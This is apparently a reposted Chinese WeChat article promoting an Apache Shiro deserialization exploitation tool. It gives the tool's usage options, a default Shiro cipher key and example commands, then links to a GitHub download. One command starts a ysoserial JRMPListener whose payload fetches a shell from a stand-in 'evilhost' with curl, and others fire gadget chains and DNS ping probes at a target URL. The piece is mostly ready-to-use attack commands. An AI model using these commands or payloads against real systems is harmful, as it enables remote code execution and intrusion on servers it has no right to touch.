Python2.7
requests
Jdk 1.8
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]
OPTIONS:
-h, --help show this help message and exit
-u URL, --url URL Target url.
-t TYPE, --type TYPE Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
-g GADGET, --gadget GADGET
gadget
-p PARAMS, --params PARAMS
gadget params
-k KEY, --key KEY CipherKey
Example: python shiro_exploit.py -u target
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell –o shell'
python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="
下载地址
https://github.com/insightglacier/Shiro_exploit
原文始发于微信公众号(扫地僧的茶饭日常):【工具篇】Apache Shiro 反序列化漏洞检测与利用工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论